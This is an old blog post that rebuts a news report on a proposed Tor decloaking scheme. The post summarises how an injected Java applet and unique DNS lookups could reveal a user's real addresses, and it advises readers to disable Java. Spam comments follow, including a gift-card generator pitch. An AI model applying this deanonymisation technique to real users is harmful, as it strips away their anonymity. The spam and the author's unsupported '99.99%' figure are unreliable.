Hacker outlines how to expose Tor-users

Wednesday, March 7th, 2007 at 2:14 am.

A paper technical paper released in February by UColorado/Boulder outlines how to attack Tor using a few evil servers. A spokesperson for the Tor-project was quick to respond, saying that they are aware of the problem and that nothing indicates that such an attack has been launched “in the wild” yet.Yesterday “respectable” publication ZDNet repored that “Hacker builds tracking system to nab Tor pedophiles“. Such tracking has nothing to do with nabbing pedophiles and everything to do with compromizing the security of the entire Tor-network and all it’s users. So this article should be very alarming.

However. A close inspection of the “tracking measures” outlined in the article indicates that the supposed “tracking” is no threat at all.

Here’s why:

The supposed tracking method what ZDNet calls “über-hacker HD Moore” proposes is:

1. Run a patched TOR server. The patches embed a Ruby interpreter into the TOR connection engine and allow arbitrary Ruby scripts to process data before sending it back to the client.

2. When child porn-related keywords are seen (either the Web request, or the response), inject a little extra HTML code into the response going back to the Web browser. This HTML code would connect to my decloaking engine.

3. The decloak engine is based on the following techniques:

Now. 1). Running a patched Tor-server is a bad thing and a threat to the network. Depending on patch. This patch, however, as described in 2), would have to be used on a Tor exit server and all it would do is to modify the HTML file passed back to the client. This, on it’s own, doesn’t do any kind of traffic, it only means that you would get a modified page back. Tor-exits modifying the traffic would on it’s own be a very bad thing, such servers mean that you would have to reload the page from another exit node if it comes back modified, but that alone is no security threat and doesn’t do any tracking.

The tracking would be done by the users browser, triggered by the extra HTML code. This concept could just as easily be done with anyone with a webserver, now can’t it? You’re reading this page, which means that I’m in control of the HTML your browser got. Pretty much the same situation of a patched Tor-exit node giving you “tracking” HTML, don’t you think? So the “Tor-server-patch” described would – at best – only be somewhat annoying.

But wait. It this kind of HTML tracking possible?

Let’s take a close look at ZDNet story regarding the actual tracking described.

a) A unique identifier is created to track this user.

b) The browser is asked to resolve a unique host name, containing the identifier, that is part of a special domain hosted on my server. I run a modified DNS server that updates a database with the address from which the DNS request is received. The goal of this step is to determine the ISP of the user.

As people who have any idea what they are talking about are aware, Tor resolves hostnames through the Tor-network. Thus; b) would determine that Someone used the patched Tor-exit, and then resolved the identifier domain using another Tor-exit. This does not reveal anything about the users ISP, it reveals.. that the same user is (still) using the Tor-network. This information is useful because..? Well, you already know the person in question is using the Tor-network, don’t you, how else would someone have fetched the page using Tor, eh?

And then there’s this:

c) The browser is asked to load a Java applet. This applet uses two different techniques to obtain information about the user.

d) The first method uses the Java API to determine the local IP address of the user. This value is then passed back to the JavaScript code in the Web HTML snippet hosting the applet. The goal of this step is to get the real *internal* IP address of the user.

e) The second method involves the applet sending a raw DNS packet, directly to my server. Since this is UDP, it does not pass through TOR, and since it is sent by the Java code, it does not go through the ISP. This packet contains the unique identifier and if received, gives away the real *external* IP of the user. The goal of this step is to get the address of the user’s NAT gateway.

Now. This information is true. Java does allow tracking of Tor users. This is true regardless of someone running a patched Tor-server. Any website with a Java-applet can track users who browse with Java enabled. This information is in every Tor-howto. You have to disable Java when you’re using Tor. You should also disable Javascript and disable Active X.

So. Tracking is still possible if you have Java enabled in your browser. And every Tor-user who even glanced at the documentation knows this. Yes, c), d) and e) are possible if the Tor-user haven’t read the fine manual, but it simply won’t work on Tor-users who have disabled Java – which is about 99.99% of Tor-users.

Oh. There’s a claim f) after e). It’s..

f) At this point, my server is able to determine the internal address of the user, the external address from which they access the internet, and the ISP they use to provide DNS resolution, as well as the IP address they come from through the TOR network. This information, along with the unique tracking ID, allows me to identify a specific workstation within an organization or residence.

Again, true for the 0,01% percent of Tor-users who browse with Java enabled.

I don’t.

So, at this point, Mr. Moore, your server still has no idea what my address is, which ISP I use for DNS resolution or the IP address I came through the Tor network, and since your server has none if this information except some tracking ID which is useless you still can’t identify me, my organization or residence.

In bullet summary:

  • Yes, you should disable Java when you’re using Tor – and the Internet in general – because Java doesn’t respect – or even care about – the web browsers proxy settings.
  • The supposed tracking system does work for the 0.01% of Tor-users who never bothered to read the documentation.

[tags]Tor, security, anonymity, internet[/tags]

126 Responses to Hacker outlines how to expose Tor-users

  1. Now you can generate a lot of gift cards of various bounds ($10, $25, $50, $100).

  2. It is the best time to make some plans for the
    future and it is time to be happy. I’ve read this post and if I may
    I want to recommend you few fascinating issues or suggestions.
    Maybe you could write next articles relating to this article.
    I desire to read more things approximately it!

    Here is my web site … hastings van insurance telephone number

  3. Marguerite says:

    A 1946 survey demonstrated that 79% of Norwegians reinforced this policy at the moment.
    Step 3: Select your source game CD DVD and select output destination and file name.
    Related growth in grammar and phonology occurred in Swedish and Danish, maintaining the dialect continuum
    in Scandinavia intact, but with dialectal deviation.

  4. It’s difficult to find knowledgeable people about this topic,
    however, you sound like you know what you’re talking about!

  5. book of ra says:

    It’s very effortless to find out any matter on net as
    compared to textbooks, as I found this piece of
    writing at this web page.

  6. Hello I am so happy I found your blog page, I really found you by accident, while I
    was looking on Aol for something else, Anyhow I am here now and would just like to
    say thank you for a incredible post and a all round exciting blog (I also love the theme/design), I don’t have time to browse it all at the minute but I have saved it and also included your RSS feeds,
    so when I have time I will be back to read a great
    deal more, Please do keep up the fantastic job.

  7. Bass wood – Used by low finish guitar producers, Bass
    wood ia a light-weight weight wood with tight grains and
    a light-weight coloration.

    Visit my blog post; Orca2.Tamu.Edu

  8. Roseanna says:

    He is a high-definition players are not heated,
    layered metal grid design, full metal body heat, you can quickly transfer heat out to ensure the normal operation of the machine, I and my husband
    often used continuously for 56 hours, But E30T outstanding performance, nor does it feel no heat.
    home theater (Roseanna) is a personal thing, from the type of TV to the sound system to the seating arrangements.

    You’ll need to get cables to connect every component of your system to the HDTV.

  9. It’s in fact very difficult in this busy life to listen news on Television, so I simply use world wide web for
    that purpose, and take the latest news.

  10. I’m not that much of a internet reader to be honest but your blogs really nice,
    keep it up! I’ll go ahead and bookmark your site to come back later on. Cheers

  11. whoah this weblog is great i love reading your posts. Stay up the good work!
    You understand, many people are looking around for this info, you could help them greatly.

  12. Incredible! This blog looks just like my old one!
    It’s on a entirely different subject but it has pretty much the same page layout
    and design. Superb choice of colors!

  13. Business says:

    Hi there Dear, are you genuinely visiting this site on a regular basis, if so after that you will absolutely obtain good knowledge.

  14. I just like the helpful information you supply on your
    articles. I’ll bookmark your weblog and check again right here regularly.
    I am fairly sure I’ll be informed many new stuff right right here!
    Good luck for the following!

  15. click here says:

    I quite like reading an article that can make people think.
    Also, thanks for allowing for me to comment!

  16. I do agree with all the concepts you have presented
    to your post. They’re very convincing and can certainly work.
    Nonetheless, the posts are too brief for newbies. May you please prolong them a bit from subsequent
    time? Thanks for the post.

    My site Trabajar online

  17. I used to be able to find good advice from your
    blog posts.

  18. I’d like to thank you for the efforts you have put in writing this website.
    I really hope to see the same high-grade blog posts from you later on as
    well. In truth, your creative writing abilities has encouraged me to
    get my own website now ;)

    Look at my blog post Chappie (2015) en entier en ligne

  19. Fastidious answer back in return of this difficulty with firm arguments and describing the whole thing concerning that.

  20. Heya i am for the first time here. I came across this board and I find It truly useful & it helped
    me out much. I hope to give something back and help others like you helped me.

  21. I constantly spent my half an hour to read this website’s content every
    day along with a cup of coffee.

  22. I like the helpful information you provide in your articles.
    I will bookmark your blog and check again here frequently.
    I’m quite certain I’ll learn plenty of new stuff right here!
    Good luck for the next!

  23. Hey There. I found your blog using msn. This is an extremely well written article.
    I will be sure to bookmark it and come back to read more of your useful information. Thanks for
    the post. I will certainly return.

  24. I could not refrain from commenting. Well written!

  25. Hello would you mind letting me know which webhost you’re utilizing?
    I’ve loaded your blog in 3 different internet browsers and
    I must say this blog loads a lot quicker then most.
    Can you recommend a good hosting provider at a
    honest price? Many thanks, I appreciate it!

  26. Thanks for every other wonderful article. Where else may just anyone get
    thbat kind of information iin such a perfect method of
    writing? I have a presentation next week, and I aam at the lokok for such info.

    Here is myy weblog :: property For sale barnet

Leave a Reply

Your email address will not be published. Fields marked * are required.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

livelyblog.com | Random blog | Login | Get your own blog | ^^^